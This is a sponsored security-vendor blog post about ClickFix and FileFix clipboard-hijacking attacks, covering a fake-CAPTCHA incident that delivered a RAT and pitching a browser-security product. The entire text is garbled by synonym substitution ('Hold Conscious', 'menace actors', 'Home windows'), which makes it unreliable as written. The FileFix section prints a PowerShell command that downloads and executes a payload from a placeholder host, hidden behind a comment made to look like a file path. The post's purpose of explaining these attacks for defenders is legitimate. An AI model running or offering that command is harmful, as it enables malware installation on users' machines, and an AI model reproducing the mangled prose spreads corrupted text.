An inside take a look at a ClickFix marketing campaign and a real-world assault, its subsequent iteration (FileFix), and the best way to forestall it in its tracks, earlier than system compromise.
ClickFix: Silent Copying to Clipboard
ClickFix, a misleading social engineering tactic, is utilized by menace actors to control unsuspecting customers into unwittingly permitting an internet web page to silently populate the clipboard.
Finally, the attacker is making an attempt to get a person to (unknowingly) execute malicious code, gathered from the browser and quietly positioned into the person’s clipboard, on the host machine.
Coined initially as “ClickFix” as a result of the social engineering prompts have been telling the person they should “repair” an issue with their browser and required the person to click on a component, this time period is now ascribed to any related assault, one during which a person clicks a component, the web page then populates the sufferer’s clipboard, and it instructs the person to stick the malicious code into their system’s terminal.
Photographs of a ClickFix assault disguised as a CAPTCHA immediate.
The above screenshots present an instance ClickFix assault. As soon as the person clicks the pretend CAPTCHA, the web page silently populates the person’s clipboard with malicious code. It then shows directions for the person to show they’re human—by pasting (the malicious code) into the Home windows Run dialog.
For extra details about ClickFix, see our article explaining the what, why, the place, and the way of ClickFix.
Hold Conscious, the purpose-built browser safety platform, detects misleading interactions in actual time, proper the place they occur.
By monitoring clipboard entry patterns, flagging suspicious net pages, and disrupting lateral motion strategies like ClickFix, Hold Conscious empowers organizations to close down assaults earlier than they ever depart the browser and attain the host.
Actual-World Assault: Google Outcome to ClickFix Try
A Hold Conscious buyer just lately encountered a ClickFix assault within the wild. Whereas looking search engine outcomes, the person clicked on a compromised website. This website, injected with malicious JavaScript, delivered a ClickFix immediate, finally for the purpose of deploying the NetSupportManager RAT backdoor.
The person had clicked on the immediate, permitting the web page to populate the clipboard (with malicious PowerShell), and instructing the person to stick into the system’s terminal.
Nonetheless, Hold Conscious recognized, blocked, and warned the person of the suspicious instructions the web page tried to populate the clipboard with, successfully stopping system compromise.
The video under walks via what guests expertise on this compromised website—a pretend CAPTCHA verification body. Upon clicking the pretend CAPTCHA, malicious JavaScript updates the person’s clipboard with malicious PowerShell code and prompts the person to stick it into the Home windows Run dialog.
Under is a walkthrough of what would have occurred if Hold Conscious’s safeguards weren’t in place to restrict the person’s actions and clear the person’s clipboard.
If the social engineering tactic had been profitable and no technical controls had been in place, the person would have unknowingly executed malicious PowerShell code.
This kicks of a collection of downloads, de-obfuscation, assembling malware on the host machine, and organising persistence within the person’s Run registry key—enabling the malware to persist on the compromised system and run every time the person logs in to their pc account.
For particular particulars about this real-world assault, together with each the preliminary obtain cradle and the following PowerShell code, try our step-by-step walkthrough.
Impression: RATs, Stealers, and Extra
ClickFix assaults use malicious JavaScript, clipboard manipulation, and social engineering to finally achieve the attacker entry from the browser to the host system.
It has been seen on each malicious and compromised net pages and has been utilized by a number of menace teams to achieve entry to sufferer machines, finally deploying malware and distant entry trojans (RATs), together with AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate malware, DanaBot stealer, and extra.
When left undeterred by technical defenses, these seemingly easy clipboard assaults can escalate into full-system compromise, giving menace actors distant management, entry to delicate information, and protracted footholds which might be tough to detect and even tougher to take away.
The Subsequent Gen: FileFix
FileFix is the subsequent iteration, the youthful sibling, of ClickFix—one other clipboard-manipulation assault designed to trick customers into executing code outdoors the browser context. First documented by safety researcher mr.d0x in late June this 12 months, FileFix dupes customers into pasting instructions instantly into File Explorer’s deal with bar, and menace actors are already adopting this newer approach.
At a look, the pasted output seems innocent, like a typical Home windows file path. However hidden in the beginning is a malicious command; the “file path” that follows is a remark, disguising the true menace.
Powershell.exe -c “iwr malicious(.)website/mal.jpg|iex” # C:OrganizationInternalDriveBusiness-RFP.pdf
The complete information copied to the person’s clipboard is a malicious PowerShell command ending in a remark containing a file path.
Discover within the picture under, how the seemingly innocent file path within the Explorer’s deal with bar doesn’t present the precise PowerShell is hidden from the person’s view.
File Explorer, opened by a Chrome tab.
Like ClickFix, the FileFix assault originates within the browser and depends on social engineering, clipboard injection, and person motion to cross the boundary between browser and host. FileFix is, at its core, a ClickFix assault particular to utilizing File Explorer.
Each occur within the browser context.
Each use the identical clipboard inhabitants approach.
Each leverage malicious and compromised web sites, blurring the road between trusted and malicious net visitors.
Each result in attacker entry on the host system.
Which means FileFix might be stopped the identical approach ClickFix is: with browser-native defenses. Browser safety options, like Hold Conscious, detect clipboard inhabitants makes an attempt in real-time and intercept suspicious code earlier than it ever reaches the host system. That is why having insurance policies constructed into the browser ensures that compromises are stored at bay.
Browser Safety Takes the Essential Stage
ClickFix and FileFix assaults reveal a crucial blind spot in lots of safety methods: the browser as a vector for host compromise. These clipboard-based strategies use social engineering and abuse the person’s interplay with seemingly reputable, and even compromised, web sites to ship malicious code.
With out visibility into browser exercise or management over clipboard entry, conventional defenses miss the early indicators. However with browser-native perception and real-time clipboard safety, organizations can intercept these assaults at their supply, earlier than any code is executed on the host.
At Hold Conscious, we’ve seen firsthand how conventional safety instruments fall brief relating to defending the browser—the first interface staff depend on and attackers exploit. That’s why we constructed our platform: to detect and block clipboard manipulation and different browser-based assaults earlier than they’ll trigger actual hurt.
Interested by studying extra? Be at liberty to request a demo right here.
Moreover, we’re proud to be named one in every of simply 4 Black Hat USA 2025 Startup Highlight Finalists for innovation, and we stay dedicated to redefining how organizations safe and handle the browser—the place the place at present’s work begins, and the place at present’s assaults usually begin.
When you’ll be attending Black Hat USA 2025 subsequent week, watch us take the stage to make our pitch, cease by the Hold Conscious sales space, or schedule time to talk with the crew on the occasion.
Sponsored and written by Hold Conscious.
